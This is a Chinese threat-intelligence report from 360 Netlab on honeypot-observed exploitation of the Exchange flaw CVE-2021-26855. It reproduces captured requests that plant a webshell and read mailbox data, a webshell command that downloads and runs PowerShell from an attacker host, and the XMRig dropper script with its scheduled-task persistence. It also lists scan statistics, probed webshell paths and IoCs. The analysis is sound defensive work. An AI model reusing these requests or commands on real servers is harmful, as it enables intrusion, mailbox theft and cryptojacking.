背景介绍
2021年3月2号,微软披露了Microsoft Exchange服务器的远程代码执行漏洞[1]。
2021年3月3号开始,360网络安全研究院Anglerfish蜜罐开始模拟和部署Microsoft Exchange蜜罐插件,很快我们搜集到大量的漏洞检测数据,目前我们已经检测到攻击者植入Webshell,获取邮箱信息,甚至进行XMRig恶意挖矿(http://178.62.226.184/run.ps1)的网络攻击行为。根据挖矿文件路径名特征,我们将该Miner命名为Tripleone。
2021年3月6号开始,ProjectDiscovery和微软CSS-Exchange项目相继披露了漏洞检测脚本[2][3]。
Microsoft Exchange服务器的远程代码执行漏洞利用步骤复杂,一般从PoC公布到黑色产业攻击者利用需要一定的时间,我们看到这个攻击现象已经开始了。
CVE-2021-26855 植入Webshell
POST /ecp/j2r3.js HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json; charset=utf-8
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.&a=~1942062522; ASP.NET_SessionId=00782f75-8b35-11eb-af5a-560002fbb132; msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.
msExchLogonMailbox: S-1-5-20
Content-Length: 381
{"properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\\\127.0.0.1\\c$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test1337.aspx"}}, "identity": {"DisplayName": "OAB (Default Web Site)", "__type": "Identity:ECP", "RawIdentity": "7280d03f-194a-4bf3-98a7-076e7728321d"}}
CVE-2021-26855 获取邮箱信息
POST //ecp/ssrf.js HTTP/1.1
Host: {target}
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Hello-World
Content-Type: text/xml
Cookie: X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;
Content-Length: 756
Default
admin@domain.tld
CVE-2021-26855 挖矿攻击
POST /owa/auth/test1337.aspx HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22powershell+IEX+%28New-Object+Net.WebClient%29.DownloadString%28http%3A%2F%2F178.62.226.184%2Frun.ps1%29%22%29.StdOut.ReadAll%28%29%29%3B
攻击者通过http://178.62.226.184/run.ps1文件植入XMRig挖矿程序,以下是攻击详情:
$ProcessActive = Get-Process javacpl -ErrorAction SilentlyContinue
if($ProcessActive -eq $null)
{
new-item c:\temp\111 -itemtype directory
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://178.62.226.184/config.json","C:\temp\111\config.json")
$WebClient.DownloadFile("http://178.62.226.184/javacpl.exe","C:\temp\111\javacpl.exe")
$WebClient.DownloadFile("http://178.62.226.184/WinRing0x64.sys","C:\temp\111\WinRing0x64.sys")
Start-Process -Filepath "C:\temp\111\javacpl.exe"
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString('http://178.62.226.184/run.ps1')"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "App2" -Description "Check"
}
else
{
Write-host "run"
}
Anglerfish蜜罐数据视野
2021年3月6日开始,360网络安全研究院Anglerfish蜜罐系统监测到Microsoft Exchange漏洞(CVE-2021-26855)扫描,截至日前,扫描源IP地址地理位置分布如下:
通过对扫描端口分析发现,扫描目的端口主要是443端口(77.3%),其次是80端口(11.3%),如下图:
根据分析捕获的扫描流量,扫描源IP ASN(Autonomous System Numbers)主要是Linode, LLC、DiGiTALOCEAN-ASN和LeaseWeb Netherlands B.V.,占比50%以上,扫描整体趋势如下:
扫描源IP来自全球各个国家,其中美国占比最大,如下图:
对捕获的流量进行分析发现,Top 5的扫描IP占比所有扫描行为的50%,其中159.89.95.163占比达24%,暴露了该IP具有一定的组织性。
通过对攻击流量进行分析发现,攻击者已经能够成功利用该漏洞植入Webshell,详情如下图所示:
攻击者通过Webshell进一步实施恶意攻击操作,如植入XMRig挖矿程序,详情如下图所示:
部分扫描源IP rDNS SLD信息
我们通过简单分析Microsoft Exchange漏洞(CVE-2021-26855)扫描的扫描源IP对应的rDNS信息,可以看到一些组织信息。
Webshell 分析
我们监测到大量Webshell路径探测请求,其中大部分是安全厂商和研究机构的扫描行为。
已知Webshell路径如下所示:
GET /aspnet_client/system_web/log.aspx 1682
GET /aspnet_client/OutlookEN.aspx 1660
GET /aspnet_client/HttpProxy.aspx 1643
GET /aspnet_client/aspnet_client.aspx 1613
GET /aspnet_client/discover.aspx 1583
GET /aspnet_client/supp0rt.aspx 1490
GET /owa/auth/OutlookEN.aspx 1464
GET /aspnet_client/aspnet_iisstart.aspx 1463
GET /owa/auth/Current/scripts/premium/fexppw.aspx 1442
GET /aspnet_client/xclkmcfldfi948398430fdjkfdkj.aspx 1441
GET /aspnet_client/Server.aspx 1433
GET /owa/auth/8Lw7tAhF9i1pJnRo.aspx 1428
GET /owa/auth/logg.aspx 1416
GET /aspnet_client/xx.aspx 1412
GET /owa/auth/a.aspx 1403
GET /owa/auth/Current/themes/errorFS.aspx 1393
GET /owa/auth/errorPage.aspx 1373
GET /owa/auth/getpp.aspx 1367
GET /aspnet_client/aspnet_pages.aspx 1364
GET /owa/auth/default.aspx 1334
GET /owa/auth/fatal-erro.aspx 1326
GET /owa/auth/errorPages.aspx 1322
GET /owa/auth/log.aspx 1311
GET /owa/auth/shel90.aspx 1306
GET /owa/auth/Err0r.aspx 1303
GET /owa/auth/logout.aspx 1302
GET /aspnet_client/log3.aspx 1293
GET /owa/auth/15.0.1347/themes/resources/exchange_create_css.aspx 1285
GET /owa/auth/RedirSuiteServerProxy.aspx 1279
GET /aspnet_client/eror.aspx 1266
GET /aspnet_client/0QWYSEXe.aspx 1263
GET /owa/auth/current/one1.aspx 1260
GET /aspnet_client/session.aspx 1242
GET /aspnet_client/iispage.aspx 1213
GET /aspnet_client/system_web/logx2.aspx 1212
GET /owa/auth/Current/themes/resources/owafont_vo.aspx 1207
GET /aspnet_client/log.aspx 1207
GET /aspnet_client/WlUtyY.aspx 1168
GET /aspnet_client/aspnet_www.aspx 1167
GET /owa/auth/15.0.847/themes/resources/hmask.aspx 1164
GET /owa/auth/Current/app222.aspx 1155
GET /owa/auth/15.1.1913/themes/resources/View_Photos.aspx 1147
GET /owa/auth/ErrorAA.aspx 1089
GET /owa/auth/one.aspx 1079
GET /aspnet_client/errorcheck.aspx 1074
GET /owa/auth/one1.aspx 1072
GET /aspnet_client/system_web/logfe.aspx 1064
GET /owa/auth/zntwv.aspx 1031
GET /owa/auth/Current/themes/resources/owafont_vn.aspx 1019
GET /owa/auth/shel.aspx 1016
GET /owa/auth/shel2.aspx 1011
GET /owa/auth/bob.aspx 1008
GET /owa/auth/OutlookZH.aspx 1008
GET /owa/auth/Current/themes/resources/daxlz.aspx 1001
GET /owa/auth/authhead.aspx 1000
GET /owa/auth/15.1.1913/themes/resources/bg_gradient_login.aspx 993
GET /aspnet_client/default1.aspx 984
GET /aspnet_client/system_web/logon.aspx 978
GET /aspnet_client/s.aspx 930
GET /aspnet_client/RedirSuiteServerProxy.aspx 927
GET /aspnet_client/8aUco9ZK.aspx 920
GET /aspnet_client/F48zhi6U.aspx 917
GET /aspnet_client/E3MsTjP8.aspx 915
GET /aspnet_client/Fc1b3WDP.aspx 915
GET /aspnet_client/2XJHwN19.aspx 907
GET /aspnet_client/0q1iS7mn.aspx 905
GET /aspnet_client/shell.aspx 901
GET /aspnet_client/McYhCzdb.aspx 898
GET /aspnet_client/sol.aspx 893
GET /aspnet_client/aspnettest.aspx 889
GET /aspnet_client/error_page.aspx 885
GET /aspnet_client/system_web/error.aspx 883
GET /aspnet_client/UwSPMsFi.aspx 882
GET /aspnet_client/web.config.aspx 878
GET /aspnet_client/shellex.aspx 876
GET /aspnet_client/uHSPTWMG.aspx 873
GET /aspnet_client/help.aspx 868
GET /aspnet_client/load.aspx 865
GET /aspnet_client/zXkZu6bn.aspx 858
GET /aspnet_client/ogu7zFil.aspx 843
GET /owa/auth/shell.aspx 644
GET /owa/auth/web.aspx 643
GET /owa/auth/aspnet_client.aspx 639
GET /owa/auth/errorEEE.aspx 635
GET /owa/auth/27fib.aspx 627
GET /owa/auth/errorEE.aspx 625
GET /owa/auth/b.aspx 624
GET /owa/auth/aspnettest.aspx 621
GET /owa/auth/healthcheck.aspx 621
GET /owa/auth/t.aspx 620
GET /owa/auth/shellex.aspx 619
GET /owa/auth/wanlin.aspx 619
GET /owa/auth/aspnet_iisstart.aspx 619
GET /owa/auth/errorFF.aspx 615
GET /owa/auth/test.aspx 615
GET /owa/auth/document.aspx 614
GET /owa/auth/xx.aspx 613
GET /owa/auth/help.aspx 612
GET /owa/auth/evilcorp.aspx 611
GET /owa/auth/web.config.aspx 606
GET /owa/auth/error_page.aspx 605
GET /owa/auth/aspnet_www.aspx 603
GET /owa/auth/errorFE.aspx 601
GET /owa/auth/errorEW.aspx 597
GET /owa/auth/OutlookDA.aspx 288
GET /owa/auth/OutlookFR.aspx 208
GET /owa/auth/OutlookIT.aspx 187
GET /owa/auth/OutlookDE.aspx 186
GET /owa/auth/OutlookES.aspx 182
GET /owa/auth/expiredpassword.aspx 175
GET /owa/auth/OutlookPL.aspx 171
GET /owa/auth/OutlookAR.aspx 165
GET /owa/auth/OutlookSE.aspx 162
GET /owa/auth/logoff.aspx 150
GET /owa/auth/OutlookAS.aspx 146
GET /owa/auth/OutlookIO.aspx 144
GET /owa/auth/OutlookCN.aspx 111
GET /aspnet_client/Service.aspx 88
GET /aspnet_client/1d.aspx 88
GET /aspnet_client/Metabase.aspx 86
GET /aspnet_client/7KmCS.aspx 86
GET /aspnet_client/config.aspx 79
GET /aspnet_client/cafZCu.aspx 78
GET /aspnet_client/8lw7tahf9i1pjnro.aspx 77
GET /aspnet_client/MAlREnavuY.aspx 77
GET /aspnet_client/a.aspx 77
GET /aspnet_client/Default.aspx 76
GET /aspnet_client/ahihi.aspx 76
GET /aspnet_client/aa.aspx 76
GET /aspnet_client/aspnet_iistart.aspx 75
GET /aspnet_client/configs.aspx 74
GET /aspnet_client/aspnet.aspx 71
GET /aspnet_client/aspx_client.aspx 69
GET /aspnet_client/error404.aspx 67
GET /aspnet_client/bob.aspx 67
GET /aspnet_client/document.aspx 67
GET /aspnet_client/authhead.aspx 67
GET /aspnet_client/current/one1.aspx 63
GET /aspnet_client/client.aspx 63
GET /aspnet_client/erroree.aspx 63
GET /owa/auth/seclogon.aspx 61
GET /aspnet_client/upnews.aspx 60
GET /aspnet_client/errorff.aspx 60
GET /owa/auth/Current/themes/resources/system_io.aspx 60
GET /owa/auth/15.1.225/scripts/premium/errorPE.aspx 59
GET /aspnet_client/y3iGH.aspx 59
GET /owa/auth/Current/themes/resources/errorFE.aspx 59
GET /owa/auth/Current/AMNBJLXqoHTV.aspx 59
GET /aspnet_client/errorew.aspx 59
GET /owa/auth/Current/themes/resources/OutlookQN.aspx 59
GET /owa/auth/Current/themes/resources/View_tools.aspx 59
GET /owa/auth/6GIXZG.aspx 59
GET /aspnet_client/system_web/ogzsis0L.aspx 59
GET /owa/auth/Current/themes/resources/Ignrop.aspx 59
GET /aspnet_client/errorpages.aspx 58
GET /aspnet_client/erroreee.aspx 58
GET /owa/auth/hmknq.aspx 57
GET /aspnet_client/system_web/4_0_30319/self.aspx 57
GET /owa/auth/DesktopShellExt.aspx 57
GET /aspnet_client/web.aspx 56
GET /aspnet_client/system_web/9VkFwtxt.aspx 56
GET /aspnet_client/default.aspx 56
GET /aspnet_client/soHKY.aspx 56
GET /aspnet_client/errorpage.aspx 56
GET /owa/auth/rlvgk.aspx 54
GET /owa/auth/logerr.aspx 54
GET /owa/auth/pzbwl.aspx 54
GET /owa/auth/owaauth.aspx 54
GET /aspnet_client/est11.aspx 54
GET /owa/auth/errorcheck.aspx 53
GET /owa/auth/Current/layout.aspx 52
GET /owa/auth/Current/themes/resources/logon.aspx 52
GET /owa/auth/CommonError.aspx 52
GET /owa/auth/Current/themes/config1.aspx 52
GET /owa/auth/ErrorDef.aspx 52
GET /owa/auth/iasads.aspx 51
GET /owa/auth/15.1.2044/themes/resources/office365_ph.aspx 51
GET /owa/auth/061a06908b.aspx 50
GET /owa/auth/Current/zJBxcBoI.aspx 50
GET /owa/auth/errorew.aspx 50
GET /aspnet_client/help..aspx 50
GET /owa/auth/15.0.1497/themes/resources/error.aspx 50
GET /owa/auth/rwinsta.aspx 50
GET /aspnet_client/t.aspx 50
GET /owa/auth/server.aspx 49
GET /owa/auth/erroreww.aspx 49
GET /aspnet_client/temp.aspx 49
GET /owa/auth/frow.aspx 49
GET /aspnet_client/test007.aspx 49
GET /owa/auth/fhsvc.aspx 49
GET /owa/auth/s.aspx 48
GET /owa/auth/errorpage.aspx 48
GET /aspnet_client/zEeomtdYcX.aspx 48
GET /owa/auth/session.aspx 48
GET /owa/auth/secauth.aspx 48
GET /owa/auth/Current/Exchanges.aspx 48
GET /owa/auth/erroree.aspx 48
GET /owa/auth/atlthunk.aspx 48
GET /aspnet_client/voqbETdoni.aspx 48
GET /owa/auth/secauth1.aspx 48
GET /owa/auth/online.aspx 48
GET /owa/auth/erroreee.aspx 48
GET /owa/auth/outlooken.aspx 48
GET /owa/auth/error.aspx 47
GET /owa/auth/ProximityService.aspx 47
GET /owa/auth/outlookfront.aspx 47
GET /owa/auth/proxylogon.aspx 47
GET /owa/auth/8lw7tahf9i1pjnro.aspx 47
GET /owa/auth/ovfwHWjwWm.aspx 47
GET /owa/auth/qnx.aspx 47
GET /owa/auth/plorion.aspx 47
GET /aspnet_client/uyqITYBPew.aspx 47
GET /owa/auth/outlookru.aspx 47
GET /aspnet_client/show.aspx 47
GET /aspnet_client/fatal-erro.aspx 46
GET /owa/auth/errorfff.aspx 46
GET /owa/auth/KBDBENE.aspx 46
GET /owa/auth/OutlookUS.aspx 46
GET /aspnet_client/system.aspx 46
GET /owa/auth/login.aspx 46
GET /owa/auth/letmeinplzs.aspx 46
GET /owa/auth/jhJ2zT9ouOfP6VnBcHg3.aspx 46
GET /owa/auth/errorff.aspx 46
GET /owa/auth/redirsuiteserverproxy.aspx 45
GET /aspnet_client/signon.aspx 45
GET /aspnet_client/healthcheck.aspx 45
GET /aspnet_client/login.aspx 45
GET /owa/auth/ntprint.aspx 45
GET /owa/auth/m0xbqRg1ranzvGD3jiXT.aspx 44
GET /aspnet_client/qfmrucnzl.aspx 44
GET /owa/auth/errorpages.aspx 44
GET /owa/auth/XblGameSave.aspx 44
GET /owa/auth/OutlookDN.aspx 44
GET /aspnet_client/obq.aspx 44
GET /owa/auth/load.aspx 44
GET /aspnet_client/logaaa.aspx 44
GET /owa/auth/discover.aspx 43
GET /owa/auth/outlookjp.aspx 43
GET /owa/auth/jOBJIfr92ERLmg1HcnF3.aspx 43
GET /owa/auth/hUjwpeROcY7Fo4g8ETH3.aspx 42
GET /aspnet_client/shel90.aspx 42
GET /aspnet_client/support.aspx 42
GET /owa/auth/HcDKNzBoha.aspx 41
GET /owa/auth/multiup.aspx 41
GET /owa/auth/FR5Ha0D1dwfsqIUMhLCQ.aspx 40
GET /owa/auth/outlookzh.aspx 40
GET /owa/auth/HUUPItrNpXvI.aspx 40
GET /owa/auth/dbuj9.aspx 40
GET /owa/auth/xclkmcfldfi948398430fdjkfdkj.aspx 40
GET /owa/auth/L2oXwTljs3GnMyHQV0KR.aspx 39
GET /owa/auth/sol.aspx 39
GET /owa/auth/httpproxy.aspx 39
GET /owa/auth/XboxNetApiSvc.aspx 39
GET /owa/auth/supp0rt.aspx 39
GET /aspnet_client/one.aspx 39
GET /owa/auth/signon.aspx 38
GET /aspnet_client/outlookjp.aspx 38
GET /owa/auth/OutlookEN.US.aspx 38
GET /owa/auth/KrhHyDPwb70ct362JmLn.aspx 38
GET /owa/auth/OutlookUN.aspx 37
GET /owa/auth/aa.aspx 36
GET /owa/auth/aaa.aspx 36
GET /owa/auth/iispage.aspx 36
GET /aspnet_client/redirsuiteserverproxy.aspx 36
GET /owa/auth/shelltest.aspx 35
GET /owa/auth/system_web/log.aspx 35
GET /owa/auth/aspx_client.aspx 35
GET /owa/auth/tst1.aspx 35
GET /owa/auth/tpmvscmgrsvr.aspx 35
GET /aspnet_client/online.aspx 34
GET /owa/auth/VqEUaLjKpcWoNC7yPMlz.aspx 34
GET /owa/auth/aspnet.aspx 34
GET /aspnet_client/outlookru.aspx 34
GET /aspnet_client/outlookzh.aspx 34
GET /aspnet_client/outlookfront.aspx 34
GET /aspnet_client/shel.aspx 33
GET /aspnet_client/logg.aspx 33
GET /owa/auth/asas.aspx 33
GET /aspnet_client/server.aspx 33
GET /owa/auth/tNLPge.aspx 32
GET /owa/auth/ahihi.aspx 32
GET /owa/auth/TimeoutLogout.aspx 32
GET /owa/auth/aspnet_pages.aspx 32
GET /owa/auth/ZI3uMczmPa5bwTYVpKsE.aspx 32
GET /owa/auth/test13037.aspx 31
GET /aspnet_client/shel2.aspx 31
GET /aspnet_client/one1.aspx 31
GET /aspnet_client/httpproxy.aspx 31
GET /owa/auth/test1337.aspx 31
GET /owa/auth/signout.aspx 29
GET /aspnet_client/outlooken.aspx 28
GET /owa/auth/default1.aspx 28
GET /owa/auth/theme-gsx8ujzpicf0.aspx 28
GET /aspnet_client/multiup.aspx 27
GET /aspnet_client/logout.aspx 27
GET /owa/auth/theme-vten8snn874b.aspx 25
GET /aspnet_client/error.aspx 8
GET /aspnet_client/errorFF.aspx 8
GET /aspnet_client/errorEE.aspx 8
GET /owa/auth/OutlookJP.aspx 6
GET /aspnet_client/errorEW.aspx 6
POST /aspnet_client/discover.aspx 5
GET /aspnet_client/errorEEE.aspx 5
POST /aspnet_client/system_web/logx2.aspx 4
GET /owa/auth/HttpProxy.aspx 4
GET /owa/auth/OutlookRU.aspx 4
GET /aspnet_client/system_web/sol.aspx 4
GET /aspnet_client/system_web/QBFjM1SC.aspx 4
GET /aspnet_client/OutlookJP.aspx 4
GET /aspnet_client/system_web/ioWYM7C4.aspx 4
GET /owa/auth/Online.aspx 4
GET /aspnet_client/MultiUp.aspx 4
GET /owa/auth/Logout.aspx 4
GET /aspnet_client/system_web/E12B65rm.aspx 4
GET /aspnet_client/system_web/vY4qLEpG.aspx 3
GET /aspnet_client/system_web/test.aspx 3
GET /aspnet_client/Online.aspx 3
GET /aspnet_client/system_web/3ue5myCq.aspx 3
GET /aspnet_client/system_web/sJ0f8qHt.aspx 3
GET /aspnet_client/system_web/cMvBgHLZ.aspx 3
GET /aspnet_client/system_web/WFk2or3Y.aspx 3
GET /aspnet_client/system_web/GnCwADKH.aspx 3
GET /aspnet_client/rabiitch.aspx 3
GET /aspnet_client/system_web/Cs64LbPk.aspx 3
GET /aspnet_client/Logout.aspx 2
GET /owa/auth/WMSPDMOD.aspx 2
GET /aspnet_client/OutlookRU.aspx 2
GET /owa/auth/Discover.aspx 2
GET /aspnet_client/system_web/2TFGNswO.aspx 2
GET /aspnet_client/Discover.aspx 2
GET /owa/auth/checkerror635284.aspx 2
GET /owa/auth/MultiUp.aspx 2
GET /aspnet_client/system_web/3NHhPxJ5.aspx 2
GET /aspnet_client/system_web/1A2ZeQOu.aspx 2
GET /owa/auth/Current/themes/resources/lgnleft.aspx 2
GET /aspnet_client/checkerror635284.aspx 2
GET /owa/auth/1d61acae91.aspx 2
GET /owa/auth/current/themes/resources/error.aspx 1
GET /aspnet_client/iisstart.aspx 1
GET /owa/auth/lo.aspx 1
GET /owa/auth/error404.aspx 1
Miscrosoft Exchange服务器分布
360 Quake网络空间测绘系统通过对全网资产测绘,发现Microsoft Exchange服务器共3,378,260条数据记录,其中有534,590个独立IP,具体分布如下图所示。
联系我们
感兴趣的读者,可以在 twitter 或者通过邮件netlab[at]360.cn联系我们。
IoC
IP:
178.62.226.184
157.245.47.214
Miner Proxy:
159.65.206.137:3333
URL:
http://178.62.226.184/mini-reverse.ps1
http://178.62.226.184/run.ps1
http://178.62.226.184/config.json
http://178.62.226.184/javacpl.exe
http://178.62.226.184/WinRing0x64.sys
MD5:
79e2c9953f452f777d55749f01e5f3b7
2d4d75e46f6de65fba2451da71686322
0fe28f557e9997cd2750ff3fa86a659e
67f2d42e30f6239114feafc9ffd009d8
0c0195c48b6b8582fa6f6373032118da
